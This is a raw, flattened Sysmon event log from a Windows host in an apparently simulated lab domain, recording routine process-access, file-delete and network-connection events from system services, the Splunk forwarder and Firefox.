14:59:36.183{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.183{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.183{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.183{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035342390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.183{B81B27B7-4013-611D-1600-00000000C801}1196NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF75f6ce1a.TMPMD5=46CEBDA045BD1F5739BB74B3122949E8,SHA256=C8239905EF6E484FAF2C433358E8F6E1BA18AC7BD2507FA9E83A3860850D4773,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.136{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.136{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.136{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.136{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.136{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.136{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.120{B81B27B7-4013-611D-1600-00000000C801}11965924C:\Windows\system32\svchost.exe{B81B27B7-72D7-613B-35B4-03000000C801}7136C:\Windows\system32\usoclient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\usocore.dll+210d2|c:\windows\system32\usocore.dll+15924|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000035342382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.120{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CC4050CF77529C6B415A634D8C03651,SHA256=2AD6566D973523EE3362CB4F8CDB6DC723454872BFA6944584335553943D57F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.067{B81B27B7-4013-611D-1600-00000000C801}1196NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.100.etlMD5=F2B6EAA52AAD8698F42F701622B7D5E8,SHA256=30BB2BB389B86EE746ACB54E94BF377BF5F53522B61C4A788EC29A4120146809,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.052{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-72D7-613B-35B4-03000000C801}7136C:\Windows\system32\usoclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.036{B81B27B7-72D8-613B-36B4-03000000C801}1232836C:\Windows\system32\conhost.exe{B81B27B7-72D7-613B-35B4-03000000C801}7136C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.005{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-72D8-613B-36B4-03000000C801}1232C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.002{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.002{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.002{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.002{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.002{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-72D7-613B-35B4-03000000C801}7136C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.001{B81B27B7-4013-611D-1600-00000000C801}11965924C:\Windows\system32\svchost.exe{B81B27B7-72D7-613B-35B4-03000000C801}7136C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+6585d|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035342422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:03.566{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52423-false52.137.106.217-443https 354300x800000000000000035342421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:03.391{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52422-false72.21.91.29-80http 354300x800000000000000035342420Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:03.334{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52421-false40.126.26.133-443https 23542300x800000000000000035342419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:37.334{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=54A64EB587517F401E79155678528124,SHA256=11E543F6085139011A77C7E6AB81D394050FDA349D07EC6605D9D67C5D1C4C46,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342418Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:37.334{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7D0E31B5CA42CA4D874BF3F05B971FF3,SHA256=7C6A7AFD8C7BA980FC2635D24E52C485DFB386D0A0925301A6336849F089BBE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342417Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:37.166{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=275C92E100D22674B32784707CAE6E07,SHA256=9B21B1596746941B3906156DAAB17ABAFF2344F419BE4198321F0E08651645BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342416Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:37.035{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C77B999139422E44BEA19CD0B2027CA6,SHA256=80317A21C1DB9E006B73FA77D6264EEA0D29B2D7F21F33DBF0C588941B429FD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:38.181{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=080476F14C8418A276FBADE04A6984D6,SHA256=C000E3B130348622448F0B320173F57736CF1D8527191A70D57B66A69B0869DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342428Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:05.180{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52424-false10.0.1.12-8000- 23542300x800000000000000035342427Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:39.651{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342426Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:39.651{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=AB574D366C692807D21037804BD485B3,SHA256=DA2BF0CA890C0D1447425F783F329BF2278932CD244958BEDC65775CB66FDD27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 